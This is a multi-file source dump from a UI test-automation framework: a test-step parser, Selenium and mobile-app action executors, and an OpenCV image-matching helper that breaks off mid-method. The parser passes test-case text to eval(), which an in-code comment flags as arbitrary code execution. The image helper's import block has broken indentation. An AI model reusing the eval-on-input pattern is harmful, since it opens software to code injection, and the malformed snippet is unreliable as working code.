        :return: the stored value
        '''
        if not re.match(r'^\${(\w+)}$', name):
            raise NameError("name '{}' is not defined".format(name))
        name = name[2:-1]
        if name in self.for_variables.keys():
            object_var = self.for_variables[name]
        elif name in self.variables:
            object_var = self.variables[name]
        elif name in self.common_var.keys():
            object_var = self.common_var[name]
        elif name in Var.extensions_var.variable.keys():
            object_var = Var.extensions_var.variable[name]
        elif name in Var.extensions_var.resource.keys():
            object_var = Var.extensions_var.resource[name]
        else:
            raise NameError("name '{}' is not defined".format(name))
        return object_var
    def _replace_string(self, content):
        """
        Quote *content* for re-embedding in a step string: strings are
        wrapped in the quote style opposite to the one they contain,
        non-strings are converted with ``str()``.
        :param content: value to serialise
        :return: quoted string representation
        """
        if isinstance(content, str):
            if re.match(r"^'(.*)'$", content):
                content = '"{}"'.format(content)
            elif re.match(r'^"(.*)"$', content):
                content = "'{}'".format(content)
            else:
                content = '"{}"'.format(content)
        else:
            content = str(content)
        return content
    def _get_replace_string(self, content):
        '''
        Substitute every ``${name}`` occurrence inside *content* with its
        quoted value and return the expanded string.
        :param content: raw step fragment
        :return: fragment with all variable references expanded
        '''
        pattern_content = re.compile(r'(\${\w+}+)')
        while True:
            if isinstance(content, str):
                search_contains = re.search(pattern_content, content)
                if search_contains:
                    search_name = self._get_variables(search_contains.group())
                    if search_name is None:
                        search_name = 'None'
                    elif isinstance(search_name, str):
                        # pick a quote style that does not clash with quotes
                        # already present in the value
                        if re.search(r'(\'.*?\')', search_name):
                            search_name = '"{}"'.format(search_name)
                        elif re.search(r'(".*?")', search_name):
                            search_name = '\'{}\''.format(search_name)
                        else:
                            search_name = '"{}"'.format(search_name)
                    else:
                        search_name = str(search_name)
                    content = content[0:search_contains.span()[0]] + search_name + content[search_contains.span()[1]:]
                else:
                    break
            else:
                content = str(content)
                break
        return content
    def _get_params_type(self, param):
        '''
        Convert one raw parameter token to a Python value: quoted strings
        are unquoted, ``${var}`` / ``${var}[key]`` references are resolved,
        anything else goes through :meth:`_get_eval`.
        :param param: raw parameter token
        :return: evaluated parameter value
        '''
        if re.match(r"^'(.*)'$", param):
            param = param.strip("'")
        elif re.match(r'^"(.*)"$', param):
            param = param.strip('"')
        elif re.match(r'(^\${\w+}?$)', param):
            param = self._get_variables(param)
        elif re.match(r'(^\${\w+}?\[.+\]$)', param):
            # subscripted reference, e.g. ${dict}[key] or ${list}[0]
            index = param.index('}[')
            param_value = self._get_variables(param[:index+1])
            key = self._get_params_type(param[index + 2:-1])
            try:
                param = param_value[key]
            except Exception as e:
                raise SyntaxError('{}: {}'.format(param, e))
        else:
            param = self._get_eval(param.strip())
        return param
    def _get_eval(self, str):
        '''
        Try to ``eval`` the token (numbers, lists, dicts, ...); on any
        failure fall back to the unchanged token.
        NOTE(review): ``eval`` on test-case text can execute arbitrary
        code; the parameter name also shadows the builtin ``str``.
        :param str: raw token
        :return: evaluated value, or the original token on failure
        '''
        try:
            str = eval(str)
        except:
            str = str
        return str
    def _get_parms(self, parms):
        '''
        Parse a ``(...)`` argument list into a Python list, splitting on
        commas/spaces while keeping quoted strings and ``${var}`` tokens
        intact.
        :param parms: raw text including the surrounding parentheses
        :return: list of evaluated arguments
        '''
        parms = parms.strip()
        if re.match('^\(.*\)$', parms):
            params = []
            pattern_content = re.compile(r'(".*?")|(\'.*?\')|(\${\w*?}\[.*?\])|(\${\w*?})|,| ')
            find_content = re.split(pattern_content, parms[1:-1])
            find_content = [x.strip() for x in find_content if x]
            for param in find_content:
                var_content = self._get_params_type(param)
                params.append(var_content)
            return params
        else:
            raise SyntaxError(parms)
    def _analysis_exist_parms_keywords(self, step):
        # keyword call with arguments, e.g. ``click(id=ok)``
        key = step.split('(', 1)[0].strip()
        parms = self._get_parms(step.lstrip(key))
        action_data = Dict({
            'key': key,
            'parms': parms,
            'step': step
        })
        return action_data
    def _analysis_not_exist_parms_keywords(self, step):
        # bare keyword without arguments, e.g. ``quit``
        key = step
        parms = None
        action_data = Dict({
            'key': key,
            'parms': parms,
            'step': step
        })
        return action_data
    def _analysis_variable_keywords(self, step):
        # variable assignment: ``${name} = <literal | func(...) | $.func(...)>``
        step_split = step.split('=', 1)
        if len(step_split) != 2:
            raise SyntaxError(f'"{step}"')
        elif not step_split[-1].strip():
            raise SyntaxError(f'"{step}"')
        name = step_split[0].strip()[2:-1]
        var_value = step_split[-1].strip()
        if re.match(r'\$\.(\w)+\(.*\)', var_value):
            # ``$.func(...)`` extension call; ``$.id`` takes its argument raw
            key = var_value.split('(', 1)[0].strip()
            if key == '$.id':
                parms = [self._get_replace_string(var_value.split(key, 1)[-1][1:-1])]
            else:
                parms = self._get_parms(var_value.split(key, 1)[-1])
        elif re.match(r'(\w)+\(.*\)', var_value):
            key = var_value.split('(', 1)[0].strip()
            parms = self._get_parms(var_value.lstrip(key))
        else:
            # plain literal / variable reference on the right-hand side
            key = None
            parms = [self._get_params_type(var_value)]
        action_data = Dict({
            'key': 'variable',
            'parms': parms,
            'name': name,
            'func': key,
            'step': step
        })
        return action_data
    def _analysis_common_keywords(self, step, style):
        # ``call name(...)``: invoke a user-defined common action
        key = step.split('call', 1)[-1].strip().split('(', 1)[0].strip()
        parms = step.split('call', 1)[-1].strip().split(key, 1)[-1]
        parms = self._get_parms(parms)
        action_data = Dict({
            'key': 'call',
            'parms': parms,
            'func': key,
            'style': style,
            'step': step
        })
        return action_data
    def _analysis_other_keywords(self, step):
        # flow-control keywords: ``if`` / ``elif`` / ``while`` / ``assert``
        key = step.split(' ', 1)[0].strip()
        parms = self._get_replace_string(step.lstrip(key).strip())
        action_data = Dict({
            'key': key,
            'parms': [parms],
            'step': f'{key} {parms}'
        })
        return action_data
    def _analysis_for_keywords(self, step):
        # ``for ${var} in <iterable>``
        f_p = re.search(r'for\s+(\$\{\w+\})\s+in\s+(\S+)', step)
        f_t = f_p.groups()
        if len(f_t) != 2:
            raise SyntaxError(f'"{step}"')
        # loop variable name (without the ``${}`` wrapper)
        iterating = f_t[0][2:-1]
        # object being iterated over
        parms = self._get_params_type(f_t[1])
        action_data = Dict({
            'key': 'for',
            'parms': [parms],
            'value': iterating,
            'step': f'for {f_t[0]} in {self._get_params_type(f_t[1])}'
        })
        return action_data
    @mach_keywords
    def _match_keywords(self, step, style):
        # Classify the step syntax and delegate to the matching parser.
        # A leading space is rejected before stripping -- presumably to
        # catch indentation mistakes in the case file (TODO confirm).
        if re.match(' ', step):
            raise SyntaxError(f'"{step}"')
        step = step.strip()
        if re.match(r'\w+\((.*)\)', step):
            return self._analysis_exist_parms_keywords(step)
        elif re.match(r'^\w+$', step):
            return self._analysis_not_exist_parms_keywords(step)
        elif re.match(r'\$\{\w+\}=|\$\{\w+\} =', step):
            return self._analysis_variable_keywords(step)
        elif re.match(r'call \w+\(.*\)', step):
            return self._analysis_common_keywords(step, style)
        elif re.match(r'if |elif |while |assert .+', step):
            return self._analysis_other_keywords(step)
        elif re.match(r'for\s+(\$\{\w+\})\s+in\s+(\S+)+', step):
            return self._analysis_for_keywords(step)
        else:
            raise SyntaxError(step)
    @executor_keywords
    def executor_keywords(self, action, style):
        # Execute a parsed action through the platform executor; a
        # ``variable`` action stores its result under the variable name.
        try:
            if action.key in Var.default_keywords_data:
                result = self.action_executor._action_executor(action)
            elif action.key in Var.new_keywords_data:
                result = self.action_executor._new_action_executo(action)
            else:
                raise NameError("'{}' is not defined".format(action.key))
            if action.key == 'variable':
                # assign the result to the step variable
                self.variables[action.name] = result
            return result
        except Exception as e:
            raise e
    def action_analysis(self, step, style, common, iterating_var):
        '''
        Parse and execute one test-case step.
        @param step: raw step text
        @param style: indentation used in the result report
        @param common: parameters supplied by a ``call`` invocation
        @param iterating_var: current ``for`` loop variable mapping
        @return: result of the executed keyword
        '''
        log_info(' {}'.format(step), Fore.GREEN)
        if not iterating_var:
            self.for_variables = {}
        else:
            self.for_variables.update(iterating_var)
            log_info(' --> {}'.format(self.for_variables))
        self.common_var = common
        # match the keyword and parse its parameters
        action_dict = self._match_keywords(step, style)
        log_info(' --> key: {}'.format(action_dict['key']))
        log_info(' --> value: {}'.format(action_dict['parms']))
        # execute the keyword
        result = self.executor_keywords(action_dict, style)
        return result
# Ad-hoc smoke check: constructing ActionAnalysis requires Var.driver to be
# populated, so this only works inside a configured fasttest run.
if __name__ == '__main__':
    action = ActionAnalysis()
|
Hanlen520/fasttest | fasttest/runner/action_executor_web.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import time
import datetime
from selenium.webdriver.remote.webelement import WebElement
from selenium.common.exceptions import JavascriptException
from fasttest.common import Var
from fasttest.common.check import check
from fasttest.drivers.driver_base_web import DriverBaseWeb
from fasttest.utils.opcv_utils import OpencvUtils
from fasttest.runner.action_executor_base import ActionExecutorBase
class ActionExecutorWeb(ActionExecutorBase):
    """Executes parsed test-case actions against a Selenium WebDriver
    session through the :class:`DriverBaseWeb` facade.

    Element-locating parameters are strings of the form
    ``"<strategy>=<value>"`` where strategy is one of id / name / class /
    tag_name / link_text / partial_link_text / xpath / css_selector,
    or an already-resolved ``WebElement``.
    """
    def _openUrl(self, action):
        """Navigate the browser to the URL given as parameter 0."""
        url = self._getParms(action, 0)
        DriverBaseWeb.open_url(url)
    def _close(self, action):
        """Close the current browser window."""
        DriverBaseWeb.close()
    def _quit(self, action):
        """Quit the driver and close every associated window."""
        DriverBaseWeb.quit()
    @check
    def _submit(self, action):
        """Submit the form containing the located element."""
        element = self._getElement(action)
        DriverBaseWeb.submit(element)
    def _back(self, action):
        """Go one step back in the browser history."""
        DriverBaseWeb.back()
    def _forward(self, action):
        """Go one step forward in the browser history."""
        DriverBaseWeb.forward()
    def _refresh(self, action):
        """Reload the current page."""
        DriverBaseWeb.refresh()
    def _queryDisplayed(self, action):
        """Wait until the element (parameter 0) is displayed."""
        parms = self._getParms(action, 0)
        if isinstance(parms, WebElement):
            element = parms
            DriverBaseWeb.query_displayed(element=element, timeout=Var.time_out)
        elif isinstance(parms, str):
            if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
                            parms.strip(), re.I):
                raise TypeError('input parameter format error:{}'.format(parms))
            key = parms.split('=', 1)[0].strip()
            value = parms.split('=', 1)[-1].strip()
            DriverBaseWeb.query_displayed(type=key, text=value, timeout=Var.time_out)
        else:
            raise TypeError('the parms type must be: WebElement or str')
    def _queryNotDisplayed(self, action):
        """Wait until the element (parameter 0) is no longer displayed."""
        parms = self._getParms(action, 0)
        if isinstance(parms, WebElement):
            element = parms
            DriverBaseWeb.query_not_displayed(element=element, timeout=Var.time_out)
        elif isinstance(parms, str):
            if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
                            parms.strip(), re.I):
                raise TypeError('input parameter format error:{}'.format(parms))
            key = parms.split('=', 1)[0].strip()
            value = parms.split('=', 1)[-1].strip()
            DriverBaseWeb.query_not_displayed(type=key, text=value, timeout=Var.time_out)
        else:
            raise TypeError('the parms type must be: WebElement or str')
    @check
    def _click(self, action):
        """Click the located element."""
        element = self._getElement(action)
        DriverBaseWeb.click(element)
    @check
    def _check(self, action):
        """Assert the element exists (locating it raises otherwise)."""
        self._getElement(action)
    @check
    def _contextClick(self, action):
        """Right-click the located element."""
        element = self._getElement(action)
        DriverBaseWeb.context_click(element)
    @check
    def _doubleClick(self, action):
        """Double-click the located element."""
        element = self._getElement(action)
        DriverBaseWeb.double_click(element)
    @check
    def _holdClick(self, action):
        """Click the located element and keep the button pressed."""
        element = self._getElement(action)
        DriverBaseWeb.click_and_hold(element)
    @check
    def _dragDrop(self, action):
        """Drag element (parameter 0) onto target element (parameter 1)."""
        element = self._getElement(action, 0)
        target = self._getElement(action, 1)
        DriverBaseWeb.drag_and_drop(element, target)
    @check
    def _dragDropByOffset(self, action):
        """Drag the element by an (x, y) pixel offset (parameters 1, 2)."""
        element = self._getElement(action)
        xoffset = self._getParms(action, 1)
        yoffset = self._getParms(action, 2)
        DriverBaseWeb.drag_and_drop_by_offse(element, float(xoffset), float(yoffset))
    def _moveByOffset(self, action):
        """Move the mouse cursor by an (x, y) pixel offset."""
        xoffset = self._getParms(action, 0)
        yoffset = self._getParms(action, 1)
        DriverBaseWeb.move_by_offset(float(xoffset), float(yoffset))
    @check
    def _moveToElement(self, action):
        """Move the mouse cursor onto the located element."""
        element = self._getElement(action)
        DriverBaseWeb.move_to_element(element)
    @check
    def _moveToElementWithOffset(self, action):
        """Move the cursor to an offset (parameters 1, 2) from the element."""
        element = self._getElement(action)
        xoffset = self._getParms(action, 1)
        yoffset = self._getParms(action, 2)
        DriverBaseWeb.move_to_element_with_offset(element, float(xoffset), float(yoffset))
    @check
    def _sendKeys(self, action):
        """Type one or two values (parameters 1[, 2]) into the element."""
        element = self._getElement(action)
        text_list = []
        if len(action.parms) == 2:
            text_list.append(self._getParms(action, 1))
        elif len(action.parms) == 3:
            # two values, e.g. a modifier key plus text
            text_list.append(self._getParms(action, 1))
            text_list.append(self._getParms(action, 2))
        else:
            raise TypeError('missing 1 required positional argument')
        DriverBaseWeb.send_keys(element, text_list)
    @check
    def _clear(self, action):
        """Clear the text of the located input element."""
        element = self._getElement(action)
        DriverBaseWeb.clear(element)
    def _maxWindow(self, action):
        """Maximize the browser window."""
        DriverBaseWeb.maximize_window()
    def _minWindow(self, action):
        """Minimize the browser window."""
        DriverBaseWeb.minimize_window()
    def _fullscreenWindow(self, action):
        """Switch the browser window to fullscreen."""
        DriverBaseWeb.fullscreen_window()
    def _deleteAllCookies(self, action):
        """Delete every cookie of the current session."""
        DriverBaseWeb.delete_all_cookies()
    def _deleteCookie(self, action):
        """Delete the cookie named by parameter 0."""
        key = self._getParms(action, 0)
        DriverBaseWeb.delete_cookie(key)
    def _addCookie(self, action):
        """Add a cookie; parameter 0 is the cookie dict expected by Selenium."""
        key = self._getParms(action, 0)
        DriverBaseWeb.add_cookie(key)
    def _switchToFrame(self, action):
        """Switch into the frame referenced by parameter 0."""
        frame_reference = self._getParms(action)
        DriverBaseWeb.switch_to_frame(frame_reference)
    def _switchToDefaultContent(self, action):
        """Switch back to the top-level document."""
        DriverBaseWeb.switch_to_default_content()
    def _switchToParentFrame(self, action):
        """Switch to the parent of the current frame."""
        DriverBaseWeb.switch_to_parent_frame()
    def _switchToWindow(self, action):
        """Switch to the window whose handle is parameter 0."""
        handle = self._getParms(action)
        DriverBaseWeb.switch_to_window(handle)
    def _setWindowSize(self, action):
        """Resize the window to width x height (parameters 0, 1)."""
        width = self._getParms(action, 0)
        # BUGFIX: height previously read parameter index 0 as well, so the
        # window height was silently set to the width value.
        height = self._getParms(action, 1)
        DriverBaseWeb.set_window_size(float(width), float(height))
    def _setWindowPosition(self, action):
        """Move the window to screen coordinates (x, y) = parameters (0, 1)."""
        x = self._getParms(action, 0)
        y = self._getParms(action, 1)
        DriverBaseWeb.set_window_position(float(x), float(y))
    def _executeScript(self, action):
        """Run a JavaScript snippet, retrying JS errors until Var.time_out."""
        endTime = datetime.datetime.now() + datetime.timedelta(seconds=int(Var.time_out))
        while True:
            try:
                js_value = self._getParms(action)
                return DriverBaseWeb.execute_script(js_value)
            except JavascriptException as e:
                # the page may still be loading -- retry until the deadline
                if datetime.datetime.now() >= endTime:
                    raise e
                time.sleep(0.1)
            except Exception as e:
                raise e
    def _matchImage(self, action):
        """Assert that match_image (parameter 1) appears in base_image
        (parameter 0) using OpenCV feature matching."""
        base_image = self._getParms(action, 0)
        match_image = self._getParms(action, 1)
        if not os.path.isfile(match_image):
            raise FileNotFoundError("No such file: {}".format(match_image))
        if not os.path.isfile(base_image):
            raise FileNotFoundError("No such file: {}".format(base_image))
        height = Var.instance.get_window_size()['height']
        orc_img = OpencvUtils(base_image, match_image, height)
        img_info = orc_img.extract_minutiae()
        if img_info:
            Var.ocrimg = img_info['ocrimg']
        else:
            raise Exception("Can't find image {}".format(match_image))
    @check
    def _saveScreenshot(self, action):
        """Screenshot the page (1 parm: name) or one element (2 parms)."""
        if len(action.parms) == 1:
            element = None
            name = self._getParms(action, 0)
        else:
            element = self._getElement(action)
            name = self._getParms(action, 1)
        return DriverBaseWeb.save_screenshot(element, name)
    @check
    def _isSelected(self, action):
        """Return whether the located element is selected."""
        element = self._getElement(action)
        return DriverBaseWeb.is_selected(element)
    @check
    def _isDisplayed(self, action):
        """Return whether the located element is displayed."""
        element = self._getElement(action)
        return DriverBaseWeb.is_displayed(element)
    @check
    def _isEnabled(self, action):
        """Return whether the located element is enabled."""
        element = self._getElement(action)
        return DriverBaseWeb.is_enabled(element)
    @check
    def _getSize(self, action):
        """Return the located element's size."""
        element = self._getElement(action)
        return DriverBaseWeb.get_size(element)
    @check
    def _getLocation(self, action):
        """Return the located element's location."""
        element = self._getElement(action)
        return DriverBaseWeb.get_location(element)
    @check
    def _getRect(self, action):
        """Return the located element's bounding rectangle."""
        element = self._getElement(action)
        return DriverBaseWeb.get_rect(element)
    @check
    def _getAttribute(self, action):
        """Return the value of attribute (parameter 1) on the element."""
        element = self._getElement(action)
        attribute = self._getParms(action, 1)
        return DriverBaseWeb.get_attribute(element, attribute)
    @check
    def _getTagName(self, action):
        """Return the located element's tag name."""
        element = self._getElement(action)
        return DriverBaseWeb.get_tag_name(element)
    @check
    def _getCssProperty(self, action):
        """Return the CSS property (parameter 1) of the element."""
        element = self._getElement(action)
        css_value = self._getParms(action, 1)
        return DriverBaseWeb.get_css_property(element, css_value)
    def _getName(self, action):
        """Return the browser name."""
        return DriverBaseWeb.get_name()
    def _getTitle(self, action):
        """Return the current page title."""
        return DriverBaseWeb.get_title()
    def _getCurrentUrl(self, action):
        """Return the current page URL."""
        return DriverBaseWeb.get_current_url()
    def _getCurrentWindowHandle(self, action):
        """Return the handle of the current window."""
        return DriverBaseWeb.get_current_window_handle()
    def _getWindowHandles(self, action):
        """Return the handles of all open windows."""
        return DriverBaseWeb.get_window_handles()
    def _getCookies(self, action):
        """Return all cookies of the current session."""
        return DriverBaseWeb.get_cookies()
    def _getCookie(self, action):
        """Return the cookie named by parameter 0."""
        key = self._getParms(action)
        return DriverBaseWeb.get_cookie(key)
    def _getWindowPosition(self, action):
        """Return the window's screen position."""
        return DriverBaseWeb.get_window_position()
    def _getWindowSize(self, action):
        """Return the window's size."""
        return DriverBaseWeb.get_window_size()
    @check
    def _getText(self, action):
        """Return the located element's visible text."""
        element = self._getElement(action)
        return DriverBaseWeb.get_text(element)
    def _getElement(self, action, index=0):
        """Resolve parameter *index* to a single WebElement.

        Accepts either a WebElement or a ``"strategy=value"`` locator
        string; raises TypeError on malformed input and Exception when
        nothing is found within Var.time_out.
        """
        parms = action.parms
        if len(parms) <= index or not len(parms):
            raise TypeError('missing {} required positional argument'.format(index + 1))
        if isinstance(parms[index], WebElement):
            element = parms[index]
        elif isinstance(parms[index], str):
            if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
                            parms[index].strip(), re.I):
                raise TypeError('input parameter format error:{}'.format(parms[index]))
            key = parms[index].split('=', 1)[0].strip()
            value = parms[index].split('=', 1)[-1].strip()
            element = DriverBaseWeb.get_element(key, value, Var.time_out)
        else:
            raise TypeError('the parms type must be: WebElement or str')
        if not element:
            raise Exception("Can't find element: {}".format(parms[index]))
        return element
    def _getElements(self, action):
        """Resolve parameter 0 (locator string) to a list of WebElements;
        raises when none are found within Var.time_out."""
        parms = self._getParms(action, 0)
        if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
                        parms.strip(), re.I):
            raise TypeError('input parameter format error:{}'.format(parms))
        key = parms.strip().split('=', 1)[0]
        value = parms.strip().split('=', 1)[-1]
        elements = DriverBaseWeb.get_elements(key, value, Var.time_out)
        if not elements:
            raise Exception("Can't find elements: {}".format(parms))
        return elements
    def _isExist(self, action):
        """Return True if the locator matches anything within Var.time_out."""
        parms = self._getParms(action, 0)
        if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
                        parms.strip(), re.I):
            raise TypeError('input parameter format error:{}'.format(parms))
        key = parms.strip().split('=', 1)[0]
        value = parms.strip().split('=', 1)[-1]
        elements = DriverBaseWeb.get_elements(key, value, Var.time_out)
        return bool(elements)
    def _isNotExist(self, action):
        """Return True if the locator matches nothing (checked immediately,
        timeout 0, so a slow-appearing element still counts as absent)."""
        parms = self._getParms(action, 0)
        if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
                        parms.strip(), re.I):
            raise TypeError('input parameter format error:{}'.format(parms))
        key = parms.strip().split('=', 1)[0]
        value = parms.strip().split('=', 1)[-1]
        elements = DriverBaseWeb.get_elements(key, value, 0)
        return not bool(elements)
Hanlen520/fasttest | fasttest/runner/action_executor_app.py | <reponame>Hanlen520/fasttest<filename>fasttest/runner/action_executor_app.py<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from fasttest.common import Var
from fasttest.drivers.driver_base_app import DriverBaseApp
from fasttest.utils.opcv_utils import OpencvUtils
from fasttest.runner.action_executor_base import ActionExecutorBase
class ActionExecutorApp(ActionExecutorBase):
    """Executes parsed test-case actions against a mobile app session
    (appium or macaca) through the :class:`DriverBaseApp` facade.

    ``click`` / ``check`` / ``isExist`` / ``isNotExist`` accept either an
    element locator or a path to a template image, in which case OpenCV
    feature matching against a fresh screenshot is used.
    """
    def _installApp(self, action):
        """Install the app package given as parameter 0."""
        parms = self._getParms(action, 0)
        DriverBaseApp.install_app(parms)
    def _uninstallApp(self, action):
        """Uninstall the app package given as parameter 0."""
        parms = self._getParms(action, 0)
        DriverBaseApp.uninstall_app(parms)
    def _launchApp(self, action):
        """Launch the app given as parameter 0."""
        parms = self._getParms(action, 0)
        DriverBaseApp.launch_app(parms)
    def _closeApp(self, action):
        """Close the app named by parameter 0, or the configured package."""
        parms = self._getParms(action, 0, ignore=True)
        if parms:
            DriverBaseApp.close_app(parms)
        else:
            # fall back to the package from the session's desired caps
            package = Var.desired_caps.package if Var.desired_caps.package else Var.desired_caps.appPackage
            DriverBaseApp.close_app(package)
    def _tap(self, action):
        """Tap the screen at (x, y) = parameters (0, 1)."""
        parms_x = self._getParms(action, 0)
        parms_y = self._getParms(action, 1)
        DriverBaseApp.tap(parms_x, parms_y)
    def _doubleTap(self, action):
        """Double-tap the screen at (x, y) = parameters (0, 1)."""
        parms_x = self._getParms(action, 0)
        parms_y = self._getParms(action, 1)
        DriverBaseApp.double_tap(parms_x, parms_y)
    def _press(self, action):
        """Long-press at (x, y); optional parameter 2 is the duration."""
        parms_x = self._getParms(action, 0)
        parms_y = self._getParms(action, 1)
        parms_s = self._getParms(action, 2, ignore=True)
        if not parms_s:
            DriverBaseApp.press(parms_x, parms_y)
        else:
            DriverBaseApp.press(parms_x, parms_y, parms_s)
    def _goBack(self, action):
        """Press the Android back key (keyevent 4)."""
        DriverBaseApp.adb_shell('shell input keyevent 4')
    def _adb(self, action):
        """Run an arbitrary adb command given as parameter 0."""
        parms = self._getParms(action, 0)
        DriverBaseApp.adb_shell(parms)
    def _swipe(self, action):
        """Swipe the screen.

        Accepted forms: 1 parm (direction name, e.g. ``up``), 2 parms
        (direction + distance), 4 parms (from-x, from-y, to-x, to-y) or
        5 parms (plus duration).
        """
        parms_fx = self._getParms(action, 0)
        parms_fy = self._getParms(action, 1, ignore=True)
        parms_tx = self._getParms(action, 2, ignore=True)
        parms_ty = self._getParms(action, 3, ignore=True)
        parms_s = self._getParms(action, 4, ignore=True)
        try:
            if len(action.parms) == 1:
                swipe_f = getattr(DriverBaseApp, 'swipe_{}'.format(parms_fx.lower()))
                swipe_f()
            elif len(action.parms) == 2:
                swipe_f = getattr(DriverBaseApp, 'swipe_{}'.format(parms_fx.lower()))
                swipe_f(parms_fy)
            elif len(action.parms) == 4:
                DriverBaseApp.swipe(parms_fx, parms_fy, parms_tx, parms_ty)
            elif len(action.parms) == 5:
                DriverBaseApp.swipe(parms_fx, parms_fy, parms_tx, parms_ty, parms_s)
            else:
                raise ValueError(len(action.parms))
        except Exception:
            # BUGFIX: the message used to say "were giver" and reported
            # len(action.step) -- the character count of the step string --
            # instead of the number of arguments supplied.
            raise TypeError('swipe takes 1, 2, 4 or 5 positional arguments but {} were given'.format(len(action.parms)))
    def _input(self, action):
        """Type text (parameter 1) into the located element (parameter 0)."""
        text = self._getParms(action, 1)
        element = self._getElement(action)
        DriverBaseApp.input(element, text)
    def _click(self, action):
        """Click an element, or tap the match position of a template image."""
        parms = self._getParms(action, 0)
        image_name = '{}.png'.format(action.step)
        img_info = self._ocrAnalysis(image_name, parms)
        if not isinstance(img_info, bool):
            # parameter was an image path: tap the matched coordinates
            if img_info is not None:
                Var.ocrimg = img_info['ocrimg']
                x = img_info['x']
                y = img_info['y']
                DriverBaseApp.tap(x, y)
            else:
                raise Exception("Can't find element {}".format(parms))
        else:
            element = self._getElement(action)
            DriverBaseApp.click(element)
    def _check(self, action):
        """Assert an element exists, by locator or by template image."""
        parms = self._getParms(action, 0)
        image_name = '{}.png'.format(action.step)
        img_info = self._ocrAnalysis(image_name, parms)
        if not isinstance(img_info, bool):
            if img_info is not None:
                Var.ocrimg = img_info['ocrimg']
            else:
                raise Exception("Can't find element {}".format(parms))
        else:
            self._getElement(action)
    def _ifiOS(self, action):
        """Return True when the session platform is iOS."""
        if Var.desired_caps.platformName.lower() == 'ios':
            return True
        return False
    def _ifAndroid(self, action):
        """Return True when the session platform is Android."""
        if Var.desired_caps.platformName.lower() == 'android':
            return True
        return False
    def _getText(self, action):
        """Return the located element's text."""
        element = self._getElement(action)
        text = DriverBaseApp.get_text(element)
        return text
    def _getElement(self, action):
        """Resolve parameter 0 to a single element (WebElement passthrough
        or driver lookup); raises when nothing is found."""
        parms = self._getParms(action, 0)
        # WebElement class depends on the active driver backend
        if Var.driver == 'appium':
            from appium.webdriver import WebElement
        if Var.driver == 'macaca':
            from macaca.webdriver import WebElement
        if isinstance(parms, WebElement):
            element = parms
        else:
            element = DriverBaseApp.find_elements_by_key(key=parms, timeout=Var.time_out, interval=Var.interval)
        if not element:
            raise Exception("Can't find element {}".format(parms))
        return element
    def _getElements(self, action):
        """Resolve parameter 0 to a list of elements; raises when empty."""
        parms = self._getParms(action, 0)
        elements = DriverBaseApp.find_elements_by_key(key=parms, timeout=Var.time_out, interval=Var.interval,
                                                      not_processing=True)
        if not elements:
            raise Exception("Can't find element {}".format(parms))
        return elements
    def _isExist(self, action):
        """Return True if the locator or template image is found."""
        parms = self._getParms(action, 0)
        image_name = '{}.png'.format(action.step)
        img_info = self._ocrAnalysis(image_name, parms)
        result = True
        if not isinstance(img_info, bool):
            if img_info is not None:
                Var.ocrimg = img_info['ocrimg']
            else:
                result = False
        else:
            elements = DriverBaseApp.find_elements_by_key(key=parms, timeout=Var.time_out, interval=Var.interval, not_processing=True)
            result = bool(elements)
        return result
    def _isNotExist(self, action):
        """Return True if the locator/template image is absent (element
        lookup uses timeout 0, i.e. checked immediately)."""
        parms = self._getParms(action, 0)
        image_name = '{}.png'.format(action.step)
        img_info = self._ocrAnalysis(image_name, parms)
        result = False
        if not isinstance(img_info, bool):
            if img_info is not None:
                Var.ocrimg = img_info['ocrimg']
                result = True
        else:
            elements = DriverBaseApp.find_elements_by_key(key=parms, timeout=0, interval=Var.interval, not_processing=True)
            result = bool(elements)
        return not result
    def _ocrAnalysis(self, image_name, match_image):
        """Screenshot the device and feature-match *match_image* against it.

        Returns the match-info dict on success, None when no match, and
        False when *match_image* is not an image path (caller then falls
        back to element lookup).  Failures are deliberately swallowed and
        reported as False, but only Exception subclasses are caught.
        """
        try:
            if not isinstance(match_image, str):
                return False
            if not os.path.isfile(match_image):
                return False
            image_dir = os.path.join(Var.snapshot_dir, 'screenshot')
            if not os.path.exists(image_dir):
                os.makedirs(image_dir)
            base_image = os.path.join(image_dir, '{}'.format(image_name))
            Var.instance.save_screenshot(base_image)
            height = Var.instance.get_window_size()['height']
            orcimg = OpencvUtils(base_image, match_image, height)
            img_info = orcimg.extract_minutiae()
            if img_info:
                return img_info
            else:
                return None
        except Exception:
            # best-effort: treat any matching failure as "not an image match"
            return False
Hanlen520/fasttest | fasttest/utils/opcv_utils.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
try:
import cv2
except:
pass
class OpencvUtils(object):
    """SURF feature matching of a template image against a screenshot,
    used to locate on-screen coordinates of a reference image."""
    def __init__(self, baseimage, matchimage, height):
        # path to the screenshot (search space)
        self.baseimage = baseimage
        # path to the template image to find
        self.matchimage = matchimage
        # logical view height, used to detect 2x (retina-style) screenshots
        self.height = height
        self.iszoom = False
    def extract_minutiae(self):
        """
        Extract and match feature points.
        :return: dict with matched ``x``/``y`` coordinates (scaled back to
            view coordinates on 2x screenshots) and the annotated match
            image under ``ocrimg``; ``None`` when no good match is found.
        """
        if os.path.exists(self.matchimage):
            self.baseimage = cv2.imread(self.baseimage)
            # self.baseimage = cv2.resize(self.baseimage, dsize=(int(self.baseimage.shape[1] / 2), int(self.baseimage.shape[0] / 2)))
            self.matchimage = cv2.imread(self.matchimage)
            view_height = self.height
            image_height = self.baseimage.shape[0]
            if view_height * 2 == image_height:
                # screenshot is exactly twice the view height -> 2x scale
                self.iszoom = True
        else:
            raise FileExistsError(self.matchimage)
        # Create a SURF detector (Hessian threshold 1000).
        surf = cv2.xfeatures2d.SURF_create(1000)
        # Detect keypoints and compute their descriptors for both images.
        keypoints1, descriptor1 = surf.detectAndCompute(self.baseimage, None)
        keypoints2, descriptor2 = surf.detectAndCompute(self.matchimage, None)
        if descriptor2 is None:
            # template produced no features -- nothing to match
            return None
